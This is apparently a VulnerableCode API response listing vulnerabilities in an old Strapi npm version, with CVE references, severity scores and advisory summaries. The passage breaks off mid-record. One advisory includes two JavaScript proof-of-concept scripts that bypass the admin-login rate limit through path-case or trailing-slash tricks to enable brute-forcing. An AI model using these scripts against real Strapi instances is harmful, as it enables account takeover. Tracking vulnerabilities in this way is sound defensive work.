Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/258989?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/258989?format=api", "purl": "pkg:npm/strapi@3.0.0-beta.20.3", "type": "npm", "namespace": "", "name": "strapi", "version": "3.0.0-beta.20.3", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45715?format=api", "vulnerability_id": "VCID-5bpn-j31w-k7gb", "summary": "Exposure of Sensitive Information to an Unauthorized Actor\nStrapi is an open-source headless content management system. Prior to version 4.10.8, anyone (Strapi developers, users, plugins) can make every attribute of a Content-Type public without knowing it. The vulnerability only affects the handling of content types by Strapi, not the actual content types themselves. Users can use plugins or modify their own content types without realizing that the `privateAttributes` getter is being removed, which can result in any attribute becoming public. This can lead to sensitive information being exposed or the entire system being taken control of by an attacker(having access to password hashes). Anyone can be impacted, depending on how people are using/extending content-types. If the users are mutating the content-type, they will not be affected. Version 4.10.8 contains a patch for this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34093", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00101", "scoring_system": "epss", "scoring_elements": "0.2753", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34093" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/commit/2fa8f30371bfd1db44c15e5747860ee5789096de", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-03T20:03:21Z/" } ], "url": "https://github.com/strapi/strapi/commit/2fa8f30371bfd1db44c15e5747860ee5789096de" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v4.10.8", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-03T20:03:21Z/" } ], "url": "https://github.com/strapi/strapi/releases/tag/v4.10.8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34093", "reference_id": "CVE-2023-34093", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34093" }, { "reference_url": "https://github.com/advisories/GHSA-chmr-rg2f-9jmf", "reference_id": "GHSA-chmr-rg2f-9jmf", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-chmr-rg2f-9jmf" }, { "reference_url": "https://github.com/strapi/strapi/security/advisories/GHSA-chmr-rg2f-9jmf", "reference_id": "GHSA-chmr-rg2f-9jmf", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-03T20:03:21Z/" } ], "url": "https://github.com/strapi/strapi/security/advisories/GHSA-chmr-rg2f-9jmf" } ], "fixed_packages": [], "aliases": [ "CVE-2023-34093", "GHSA-chmr-rg2f-9jmf" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5bpn-j31w-k7gb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46009?format=api", "vulnerability_id": "VCID-adab-ztym-ayhd", "summary": "Strapi may leak sensitive user information, user reset password, tokens via content-manager views\nAttackers can get access to user reset password tokens if they have the configure view permissions.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-36472", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00137", "scoring_system": "epss", "scoring_elements": "0.33373", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-36472" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v4.11.7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-25T15:00:22Z/" } ], "url": "https://github.com/strapi/strapi/releases/tag/v4.11.7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36472", "reference_id": "CVE-2023-36472", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36472" }, { "reference_url": "https://github.com/advisories/GHSA-v8gg-4mq2-88q4", "reference_id": "GHSA-v8gg-4mq2-88q4", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-v8gg-4mq2-88q4" }, { "reference_url": "https://github.com/strapi/strapi/security/advisories/GHSA-v8gg-4mq2-88q4", "reference_id": "GHSA-v8gg-4mq2-88q4", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-25T15:00:22Z/" } ], "url": "https://github.com/strapi/strapi/security/advisories/GHSA-v8gg-4mq2-88q4" } ], "fixed_packages": [], "aliases": [ "CVE-2023-36472", "GHSA-v8gg-4mq2-88q4" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-adab-ztym-ayhd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/54450?format=api", "vulnerability_id": "VCID-ax22-q11r-7kgc", "summary": "Weak Password Recovery Mechanism for Forgotten Password\nIn Strapi, the admin panel allows the changing of one's own password without entering the current password. An attacker who gains access to a valid session can use this to take over an account by changing the password.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28128", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00259", "scoring_system": "epss", "scoring_elements": "0.49546", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00259", "scoring_system": "epss", "scoring_elements": "0.49484", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28128" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/issues/9657", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/issues/9657" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v3.6.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/releases/tag/v3.6.0" }, { "reference_url": "https://strapi.io/changelog", "reference_id": "", "reference_type": "", "scores": [], "url": "https://strapi.io/changelog" }, { "reference_url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-008.txt", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-008.txt" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28128", "reference_id": "CVE-2021-28128", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28128" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/80655?format=api", "purl": "pkg:npm/strapi@3.6.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-17bb-9xte-jbeg" }, { "vulnerability": "VCID-1j5t-31jf-aucc" }, { "vulnerability": "VCID-1nkk-pvsd-x7dn" }, { "vulnerability": "VCID-5bpn-j31w-k7gb" }, { "vulnerability": "VCID-5n69-472h-rbcn" }, { "vulnerability": "VCID-6tkp-v5jw-dke9" }, { "vulnerability": "VCID-adab-ztym-ayhd" }, { "vulnerability": "VCID-byez-u4kv-7qac" }, { "vulnerability": "VCID-dxss-at1b-vkaq" }, { "vulnerability": "VCID-g1c3-eb5k-sfgn" }, { "vulnerability": "VCID-mffu-ck9j-vkg8" }, { "vulnerability": "VCID-n7t6-zk51-afc3" }, { "vulnerability": "VCID-qcu6-ntuc-byea" }, { "vulnerability": "VCID-v79g-np4c-kygh" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@3.6.1" } ], "aliases": [ "CVE-2021-28128", "GHSA-37hx-4mcq-wc3h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ax22-q11r-7kgc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46012?format=api", "vulnerability_id": "VCID-byez-u4kv-7qac", "summary": "Strapi Improper Rate Limiting vulnerability\n### 1. Summary\nThere is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it.\n\n### 2. Details\nIt is possible to avoid this by modifying the rate-limited request path as follows.\n1. Manipulating request paths to upper or lower case. (Pattern 1)\n - In this case, avoidance is possible with various patterns.\n2. Add path slashes to the end of the request path. (Pattern 2)\n\n### 3. PoC\nAccess the administrator's login screen (`/admin/auth/login`) and execute the following PoC on the browser's console screen.\n\n#### Pattern 1 (uppercase and lowercase)\n```js\n// poc.js\n(async () => {\n const data1 = {\n email: \"admin@strapi.com\", // registered e-mail address\n password: \"invalid_password\",\n };\n const data2 = {\n email: \"admin@strapi.com\",\n password: \"RyG5z-CE2-]*4e4\", // correct password\n };\n\n for (let i = 0; i < 30; i++) {\n await fetch(\"http://localhost:1337/admin/login\", {\n method: \"POST\",\n body: JSON.stringify(data1),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n }\n\n const res1 = await fetch(\"http://localhost:1337/admin/login\", {\n method: \"POST\",\n body: JSON.stringify(data2),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n console.log(res1.status + \" \" + res1.statusText);\n\n const res2 = await fetch(\"http://localhost:1337/admin/Login\", { // capitalize part of path\n method: \"POST\",\n body: JSON.stringify(data2),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n console.log(res2.status + \" \" + res2.statusText);\n})();\n```\n\n##### This PoC does the following:\n1. Request 30 incorrect logins.\n4. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`)\n5. Next, falsify the pathname of the request (**`/admin/Login`**) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`)\n\n#### Pattern 2 (trailing slash)\n```js\n// poc.js\n(async () => {\n const data1 = {\n email: \"admin@strapi.com\", // registered e-mail address\n password: \"invalid_password\",\n };\n const data2 = {\n email: \"admin@strapi.com\",\n password: \"RyG5z-CE2-]*4e4\", // correct password\n };\n\n for (let i = 0; i < 30; i++) {\n await fetch(\"http://localhost:1337/admin/login\", {\n method: \"POST\",\n body: JSON.stringify(data1),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n }\n\n const res1 = await fetch(\"http://localhost:1337/admin/login\", {\n method: \"POST\",\n body: JSON.stringify(data2),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n console.log(res1.status + \" \" + res1.statusText);\n\n const res2 = await fetch(\"http://localhost:1337/admin/login/\", { // trailing slash\n method: \"POST\",\n body: JSON.stringify(data2),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n console.log(res2.status + \" \" + res2.statusText);\n})();\n```\n\n##### This PoC does the following:\n1. Request 30 incorrect logins.\n2. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`)\n3. Next, falsify the pathname of the request (**`/admin/login/`**) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`)\n\n\n\n### 4. Impact\n It is possible to bypass the rate limit of the login function of the admin screen. \nTherefore, the possibility of unauthorized login by login brute force attack increases.\n\n### 5. Measures\nForcibly convert the request path used for rate limiting to upper case or lower case and judge it as the same path. (`ctx.request.path`) \nAlso, remove any extra slashes in the request path.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-38507", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00255", "scoring_system": "epss", "scoring_elements": "0.4913", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-38507" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-25T18:05:45Z/" } ], "url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v4.12.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-25T18:05:45Z/" } ], "url": "https://github.com/strapi/strapi/releases/tag/v4.12.1" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38507", "reference_id": "CVE-2023-38507", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38507" }, { "reference_url": "https://github.com/advisories/GHSA-24q2-59hm-rh9r", "reference_id": "GHSA-24q2-59hm-rh9r", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-24q2-59hm-rh9r" }, { "reference_url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r", "reference_id": "GHSA-24q2-59hm-rh9r", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-25T18:05:45Z/" } ], "url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r" } ], "fixed_packages": [], "aliases": [ "CVE-2023-38507", "GHSA-24q2-59hm-rh9r" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-byez-u4kv-7qac" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/109177?format=api", "vulnerability_id": "VCID-dxss-at1b-vkaq", "summary": "Strapi mishandles hidden attributes within admin API responses\nStrapi before 3.6.10 and 4.x before 4.1.10 mishandles hidden attributes within admin API responses.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-31367", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71643", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71599", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-31367" }, { "reference_url": "https://github.com/kos0ng/CVEs/tree/main/CVE-2022-31367", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-05-22T13:50:00Z/" } ], "url": "https://github.com/kos0ng/CVEs/tree/main/CVE-2022-31367" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/pull/13185", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/pull/13185" }, { "reference_url": "https://github.com/strapi/strapi/pull/13189", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/pull/13189" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v3.6.10", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-05-22T13:50:00Z/" } ], "url": "https://github.com/strapi/strapi/releases/tag/v3.6.10" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v4.1.10", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-05-22T13:50:00Z/" } ], "url": "https://github.com/strapi/strapi/releases/tag/v4.1.10" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31367", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31367" }, { "reference_url": "https://github.com/advisories/GHSA-4phg-hpqm-c3j4", "reference_id": "GHSA-4phg-hpqm-c3j4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4phg-hpqm-c3j4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/145973?format=api", "purl": "pkg:npm/strapi@3.6.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1nkk-pvsd-x7dn" }, { "vulnerability": "VCID-5bpn-j31w-k7gb" }, { "vulnerability": "VCID-5n69-472h-rbcn" }, { "vulnerability": "VCID-6tkp-v5jw-dke9" }, { "vulnerability": "VCID-adab-ztym-ayhd" }, { "vulnerability": "VCID-byez-u4kv-7qac" }, { "vulnerability": "VCID-mffu-ck9j-vkg8" }, { "vulnerability": "VCID-n7t6-zk51-afc3" }, { "vulnerability": "VCID-v79g-np4c-kygh" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@3.6.10" } ], "aliases": [ "CVE-2022-31367", "GHSA-4phg-hpqm-c3j4" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dxss-at1b-vkaq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/42535?format=api", "vulnerability_id": "VCID-g1c3-eb5k-sfgn", "summary": "Command injection in strapi\nArbitrary Command Injection in GitHub repository strapi/strapi prior to 4.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-0764", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00217", "scoring_system": "epss", "scoring_elements": "0.44345", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00217", "scoring_system": "epss", "scoring_elements": "0.44276", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-0764" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/blob/master/packages/generators/app/lib/utils/fetch-npm-template.js#L13", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/blob/master/packages/generators/app/lib/utils/fetch-npm-template.js#L13" }, { "reference_url": "https://github.com/strapi/strapi/commit/2a3f5e988be6a2c7dae5ac22b9e86d579b462f4c", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/commit/2a3f5e988be6a2c7dae5ac22b9e86d579b462f4c" }, { "reference_url": "https://github.com/strapi/strapi/issues/12879", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/issues/12879" }, { "reference_url": "https://huntr.dev/bounties/001d1c29-805a-4035-93bb-71a0e81da3e5", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://huntr.dev/bounties/001d1c29-805a-4035-93bb-71a0e81da3e5" }, { "reference_url": "https://www.github.com/strapi/strapi/commit/2a3f5e988be6a2c7dae5ac22b9e86d579b462f4c", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.github.com/strapi/strapi/commit/2a3f5e988be6a2c7dae5ac22b9e86d579b462f4c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0764", "reference_id": "CVE-2022-0764", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0764" }, { "reference_url": "https://github.com/advisories/GHSA-xrjf-phvv-r4vr", "reference_id": "GHSA-xrjf-phvv-r4vr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xrjf-phvv-r4vr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/60816?format=api", "purl": "pkg:npm/strapi@4.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@4.1.0" } ], "aliases": [ "CVE-2022-0764", "GHSA-xrjf-phvv-r4vr" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g1c3-eb5k-sfgn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/52719?format=api", "vulnerability_id": "VCID-gkb4-ad7n-byd5", "summary": "Improper Input Validation\nStrapi could allow a remote authenticated attacker to bypass security restrictions because templates are stored in a global variable without any sanitation. By sending a specially crafted request, an attacker could exploit this vulnerability to update the email template for both password reset and account confirmation emails.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-13961", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00622", "scoring_system": "epss", "scoring_elements": "0.70518", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00622", "scoring_system": "epss", "scoring_elements": "0.70476", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-13961" }, { "reference_url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/183045", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": 